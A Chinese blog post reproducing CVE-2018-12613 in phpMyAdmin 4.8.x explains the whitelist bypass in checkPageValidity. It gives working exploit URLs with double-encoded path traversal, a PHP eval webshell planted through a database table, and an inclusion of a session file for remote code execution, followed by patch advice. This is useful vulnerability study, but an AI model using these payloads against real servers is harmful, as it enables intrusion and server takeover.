CVE-2018-12613 --- 本地文件包含造成远程代码执行漏洞复现

最新推荐文章于 2025-03-20 19:30:06 发布
最新推荐文章于 2025-03-20 19:30:06 发布
阅读量3.5k 收藏 6
点赞数 5
分类专栏: PHP代码审计 web安全 漏洞复现 文章标签: CVE-2018-12613 本地文件包含 任意代码执行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34444097/article/details/85264686
版权

0x01 了解本地文件包含

LFI(本地文件包含),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。

0x02 了解远程代码执行

RCE(远程代码执行),远程命令执行漏洞,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许攻击者通过改变 $PATH 或程序执行环境的其他方面来执行一个恶意构造的代码。

0x03 漏洞影响版本

  • Phpmyadmin Phpmyadmin 4.8.0
  • Phpmyadmin Phpmyadmin 4.8.0.1
  • Phpmyadmin Phpmyadmin 4.8.1

0x04 了解PHPmyadmin

phpMyAdmin是phpMyAdmin团队开发的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。 phpMyAdmin 4.8.2之前的4.8.x版本中存在安全漏洞。攻击者可利用该漏洞包含(查看并可能执行)服务器上的文件。

0x05 漏洞起因

index.php,61行
在这里插入图片描述
这里的target可以直接传值输入,我们可以传入一个本地文件路径去让其包含,就会造成LFI漏洞。
要想成功包含target,需要满足五个条件:

  • 非空
  • 是字符串
  • 不以index开头
  • 不在黑名单target_blacklist
  • 符合函数checkPageValidity的验证
    接下来跟进checkPageValidity函数
    phpMyAdmin-4.8.1-english\libraries\classes\Core.php,443行
    在这里插入图片描述
    可以看到,要想使该函数返回true,包含的文件必须包含在白名单$whitelist中,
    下面是白名单$whitelist的内容:
    phpMyAdmin-4.8.1-english\libraries\classes\Core.php,31行
    在这里插入图片描述
    所以只要包含其中之一即可。
    第一个返回true的地方,page参数未做任何修饰,直接验证是否在白名单whitelist中,无法利用
    在这里插入图片描述
    第二个返回true的地方,
    在这里插入图片描述
    函数mb_substr说明
    在这里插入图片描述
    函数mb_strpos说明
    在这里插入图片描述
    即判断?后面的字符串是否满足白名单,那么我们是否可以利用跨路径来包含文件呢?比如xxx.php?/../../../,(这里的xxx.php当然指的就是上面提到的白名单$whitelist的内容),回答是不能的,因为在PHP中会把?后面的内容作为文件xxx.php中的参数,因此不能绕过。
    第三个返回true的地方,
    在这里插入图片描述
    与第二处的区别就是多了urldecode函数,问题就出在这里了。
    上面提到的导致不能绕过白名单的原因就是的缘故,所以这里用url全编码方式对进行编码就可以绕过。
    payload:http://127.0.0.1/phpMyAdmin-4.8.1-english/index.php?target=db_datadict.php%25%33%66/../../../../../../../../../windows/system.ini
    在这里插入图片描述
    include $_REQUEST[‘target’];
    就变成
    include ‘export.php%3f/../../../../../../../../../windows/system.ini'

0x06 利用方式

0x01 利用数据库创建shell

测试发现,如果把WebShell当做数据表的字段值是可以完美的写入到数据库文件当中的。
登录phpmyadmin,在test数据库新建一个数据表,字段为一句话木马:

<?php @eval($_GET['s']);?>

保存。
在这里插入图片描述
查询生成文件的绝对路径
show variables like '%datadir%';
在这里插入图片描述
查看生成的.frm文件,shell已经成功写入
在这里插入图片描述

利用本地文件包含去包含/bin/mysql/data/test/shell.frm文件即可RCE。
payload:http://127.0.0.1/phpMyAdmin-4.8.1-english/index.php?s=phpinfo();&target=db_datadict.php%25%33%66/../../../bin/mysql/mysql5.7.21/data/test/shell.frm
s为一句话木马的连接密码,
可以看到,RCE已经成功。

在这里插入图片描述

0x02 利用session文件创建shell

执行sql语句,查看session
在这里插入图片描述
生成的session文件
在这里插入图片描述

执行payload:http://127.0.0.1/phpMyAdmin-4.8.1-english/index.php?s=phpinfo();&target=db_datadict.php%25%33%66/../../../tmp/sess_bv6e61104hvbsbkebdoikk3ke0c0er5k,成功执行
在这里插入图片描述

0x07 修复建议

  1. 升级版本;
  2. checkPageValidity函数返回false
    index.php,59
    在这里插入图片描述
    phpMyAdmin-4.8.1-english\libraries\classes\Core.php,443行
    在这里插入图片描述

0x08 参考文章

  1. https://mp.weixin.qq.com/s/HZcS2HdUtqz10jUEN57aog
  2. http://www.hetianlab.com/expc.do?ce=d223c7ad-cb9a-461d-bf5c-9ebd4a2f7614
[漏洞挖掘与防护] 03.漏洞利用之WinRAR安全缺陷复现CVE-2018-20250)及软件自启动分析
杨秀璋的专栏
08-26 637
上一篇文章将详细介绍MS08-067远程代码执行漏洞CVE-2008-4250)及防御过程,它是Windows Server服务RPC请求缓冲区溢出漏洞,利用445端口,并通过Metasploit工具获取shell及进行深入的操作。这篇文章将详细讲解WinRAR漏洞CVE-2018-20250),并复现了该漏洞和讲解了恶意软件自启动劫持原理。基础性文章,希望对入门的同学有帮助。
Grafana SQL表达式允许远程代码执行漏洞复现(CVE-2024-9264)
iSee857的博客
12-09 487
在新版Grafana中引用了实验性SQL表达式功能中的一个DuckDB导致存在SQL注入漏洞。这些查询在传递给之前未经过充分清理duckdb,导致命令注入和本地文件包含漏洞
CVE-2018-12613复现
0xdawn的博客
01-31 4736
0x00 漏洞描述 ​ 攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。 攻击者必须经过身份验证,但在这些情况下除外: $ cfg [‘AllowArbitraryServer’] = true:攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码; $ ...
BUUCTF[PHPMYADMIN]CVE-2018-12613
qq_62078839的博客
04-24 2170
打开所提供的网址 是个phpmyadmin界面 phpmyadmin的版本号为4.8.1 在phpmyadmin的版本号为4.8.1以及4.8.0的版本中有着包含(查看并可能执行)服务器上的文件的漏洞,详情可看这篇文章 phpMyAdmin 是一套开源的、基于Web的MySQL数据库管理工具。在 4.8.2 之前的 phpMyAdmin 4.8.x 中发现了一个问题,其中攻击者可以在服务器上包含文件。该漏洞来自 phpMyAdmin 中重定向和加载页面的部分代码,以及对白名单页面的不当测试..
jQuery最新xss漏洞浅析、复现、修复
最新发布
m0_59598029的博客
03-20 708
形成:xss漏洞也叫跨站点脚本编制,形成的原因简单说就是应用程序未对用户可控制的输入正确进行无害化处理,就将其放置到充当 Web 页面的输出中。这可被跨站点脚本编制攻击利用。危害:一旦注入恶意脚本后,攻击者就能够执行各种恶意活动。攻击者可能将私有信息(例如可能包含会话信息的 cookie)从受害者的机器传输给攻击者。攻击者可能以受害者的身份将恶意请求发送到Web 站点,如果受害者具有管理该站点的管理员特权,这可能对站点尤其危险。
CVE-2018-12613 本地文件包含漏洞复现+漏洞分析
qq_39407165的博客
06-07 178
phpMyAdmin是phpMyAdmin团队开发的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。CVE-2018-12613,这是一个在phpMyAdmin4.8.x(4.8.2之前)上发现的文件包含漏洞,攻击者可以利用该漏洞在后台进行任意的文件包含。也就也为着攻击者可以通过webshell直接拿下搭建了该服务的站点。
CVECVE-2018-12613:windows 复现 phpMyAdmin 本地文件包含造成远程代码执行漏洞
边扯边淡
11-24 1141
起序:在做 Web 题遇到的,复现一下。 一、靶场环境 VMware Workstation 15.5 Pro cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso phpStudy 2018 phpMyAdmin-4.8.1-all-languages 二、漏洞分析 1、本地文件包含 LFI(本地文件包含),是指当服务器开启 allow_url_include 选项时,就可以通过php的某些特性函数 include(),require()和inclu
CVE-2018-12613远程文件包含
weixin_30908941的博客
08-07 370
问题在index.php的55~63行 // If we have a valid target, let's load that script instead if (! empty($_REQUEST['target']) && is_string($_REQUEST['target']) && ! preg_m...
Zimbra 远程代码执行漏洞(CVE-2019-9670)漏洞分析
4SecNet团队专栏
04-19 6278
漏洞的主要利用手法是通过。符号没有进行处理,就会导致上述类型的攻击,攻击者在发送上述类型的数据包的时候可以新建一个。的内容,这样一来处理数据会很方便,但同时也会有巨大的安全隐患:如果把目标。获取,其实只需要将上边的数据包中的字段修改下即可直接获取到高权限的。,在解析的过程中遇到实体的引用会直接获取相应的内容,即这里碰到。函数的处理流程,在整体的处理过程中对于请求的数据包,只针对。两个字段进行的解析,在解析的过程中会判断获取到的邮箱地址和。免费、简单,已经获得了广泛的支持,方便大众的使用。
vulhub复现CVE-2021-44228log4j漏洞
weixin_48878440的博客
12-12 1104
vulhub复现cve-2021-44228 log4j漏洞
Apache Tomcat 信息泄露漏洞CVE-2024-21733、CVE-2024-24549和CVE-2024-34750排查处理
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
08-14 6985
现场的为中小型项目,未直接使用功能tomcat作为容器使用,仅是jar包里spring-boor框架引入tomcat 内嵌到 web项目中作为web server使用,从而保证项目包可直接运行 webapp项目,无需再部署到额外的tomcat服务了;当不想因为Tomcat就改变SpringBoot的版本时,可以采用排除SpringBoot中的Tomcat包,然后手动指定新的Tomcat的版本来实现升级内置组件的目的,当然还要引入Tomcat相关的包。其中,Coyote作为Tomcat的。
CVE-2018-12613 PhpMyadmin后台文件包含分析
热门推荐
3569
06-27 1万+
2018年6月19日,phpmyadmin在最新版本修复了一个严重级别的漏洞.描述:一个攻击者可以在服务器上包含(查看和潜在执行)文件的漏洞被发现。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。攻击者必须经过身份验证,但在这些情况下除外:$ cfg ['AllowArbitraryServer'] = true:攻击者可以指定他/她已经控制...
CVE-2018-12613 PhpMyadmin后台文件包含
baidu_26383841的博客
12-20 1214
当我们访问开放了用户注册和登录入口的站点时,正常情况下,用户访问每个页面站点都要检查当前登录的用户是否具有该页面的权限;如果站点不对用户权限进行检查,那么用户就可以访问该站点的任意页面,甚至可以查看其他用户的主页信息等。因此对用户访问的每个页面都进行权限检查是网站必须执行的操作。而实现该操作需要在每一个页面中都写一段检查用户权限的代码,而检查用户的权限执行的是相同的逻辑操作,这就意味着每个页面都存在一段相同的代码,这是一个不理想的状态。
Elasticsearch 核心插件Kibana 本地文件包含漏洞分析(CVE-2018-17246)
ahhacker86的专栏
01-23 1599
LFI通常出现在PHP应用中,通样是require这次应用在Nodejs程序中,相信未来还会有更多的Nodejs程序存在这种问题,原因是本地包含漏洞出现了很多年,但依旧有很多软件开发人员和架构师没有考虑到这点,这篇文章很好的说明了Kibana中存在的一个关键LFI漏洞,使得攻击者能够在服务器上运行本地代码,可造成直接的危害就是拒绝服务攻击,若在生产环境下业务实在伤不起,需要引起对Nodejs LFI的重视。
CVE-2018-12613 文件包含漏洞 复现
qq_41567985的博客
09-27 314
漏洞来自页面重定向和在phpMyAdmin中加载的部分代码,以及对列入白名单的页面的不正确测试。除“ $ cfg [‘AllowArbitraryServer’] = true”情况(攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码)外,攻击者还必须经过身份验证。总结一下: 通过这个漏洞复现,我了解到了session的一些作用,原来在sql功能点使用select “code”执行的code会被存储在session中,但貌似也只存在于4.8.0 和 4.8.1这两个版本中。
漏洞复现CVE-2018-12613
Amire0x的小乐园
09-14 759
phpmyadmin(CVE-2018-12613) 影响版本 phpMyAdmin 4.8.0-4.8.1版本 分析 $target_blacklist = array ( 'import.php', 'export.php' ); //可以看到,要达到文件包含的目的,需要满足5个条件 if (! empty($_REQUEST['target'])//非空 && is_string($_REQUEST['target'])//必须是字符串 &&
小白也可以看懂的漏洞分析(CVE-2018-12613)
西西弗斯的巨石
05-20 4885
漏洞编号CVE-2018-12613,这是一个在phpMyAdmin4.8.x(4.8.2之前)上发现的文件包含漏洞,攻击者可以利用该漏洞在后台进行任意的文件包含。也就也为着攻击者可以通过webshell直接拿下搭建了该服务的站点。本篇文章主要侧重于对该漏洞的原理进行分析,并给出利用该漏洞的方法。并介绍了理解该漏洞的背景知识。
墨者靶场 phpMyAdmin后台文件包含分析溯源 (CVE-2018-12613)
曹振国的博客
06-15 5483
phpMyAdmin第一种:一、利用burp爆破出账号密码二、尝试写马连入蚁剑1.发现MySQL对导入导出没做任何限制2.查询日志3.利用日志写文件4.访问写入的日志文件6.尝试直接通过into outfile写入一句话木马7.访问phpinfo文件,并连接蚁剑得到key值第二种:一、下载index.php文件进行分析1.发现55到63行存在问题二、下载Core.php进行分析1.找到checkPageValidity函数,在第443行2.查看白名单数组$whitelist3.包含根目录下的key.txt得
CVE-2018-12613phpMyAdmin文件包含漏洞复现
顶峰
03-29 717
漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值